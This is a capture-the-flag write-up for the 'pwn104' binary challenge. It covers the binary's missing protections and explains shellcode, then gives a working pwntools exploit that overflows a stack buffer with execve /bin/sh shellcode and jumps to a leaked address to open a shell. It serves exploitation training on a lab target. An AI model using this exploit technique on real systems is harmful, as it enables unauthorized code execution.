pwn104
104#
Introduction#
First of all we are going to do some file checks, to see the binary protections and determine the file type
pwn104.pwn104: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=60e0bab59b4e5412a1527ae562f5b8e58928a7cb, for GNU/Linux 3.2.0, not stripped
We can see that the binary is a 64 bit Least Significant Byte executable, in other words it uses little endian. The binary is dynamically linked to a LIBC and it is not stripped.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
we can also see the protections around it, you can refer back to pwn103 above to see what this protections mean.
So interesting enough we can see that under NX, it is unknown, this could potentialy mean that we can execute shellcode on the stack. Running the binary may confirm this
I think I have some super powers 💪
especially executable powers 😎💥
Can we go for a fight? 😏💪
I'm waiting for you at 0x7ffe12e976e0
So what is shellcode? Shellcode is essentially machine code designed to be injected and executed as part of a larger software system. It’s commonly used in exploits to achieve various goals, often to spawn a shell or grant unauthorized access to a system. Let’s delve deeper into how shellcode works: Anatomy of Shellcode:
Assembly Instructions:
Shellcode comprises low-level assembly instructions, usually handcrafted or generated by specialized tools like shellcraft or extracted from shellcode databases.
These instructions are often minimal and aim to perform specific tasks such as spawning a shell (/bin/sh) or executing system commands.
Functionality:
The shellcode's primary function is to manipulate the program's flow or system resources to achieve a specific goal, like gaining unauthorized access or spawning a shell.
Common shellcode tasks include modifying memory, calling system functions, or executing shell commands by taking advantage of vulnerabilities in the target program.
In an exploit scenario, shellcode is injected into a vulnerable program and usually occurs through buffer overflows or other vulnerabilities that allow arbitiary code execution. The shellcode is set to overwrite specific memory region, such as the return address or function pointers, to redirect the program flow. Once injected and executed, the shellcode’s instructions start running within the context of the compromised program. The shellcode typically performs its predefined tasks, which could involve spawning a shell, granting escalated privileges, or executing specific commands.
Exploit#
So we can see that the program gives us some address so we can maybe grab that and this location could be where we can execute shellcode
Next we are going to need shellcode, so there are two ways to get shellcode. One way being using shellcraft which is a tool which generates shellcode, the other way is using the shellcode database.
Here i am going to get one from the database shellstrom
Smooth, next we need to fill the buffer which will allow us to execute shellcode.
from pwn import *
p = process("./pwn104.pwn104")
#p = remote(thm_ip, 9004)
p.recvuntil(b'at ')
output = p.recv()
print(output)
bufferlocation = p64(int(output, 16))
shellcode = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
payload = shellcode
payload += b'A' * (88 - len(shellcode))
payload += bufferlocation
p.sendline(payload)
p.interactive()
You can use also use shellcraft to create your payload.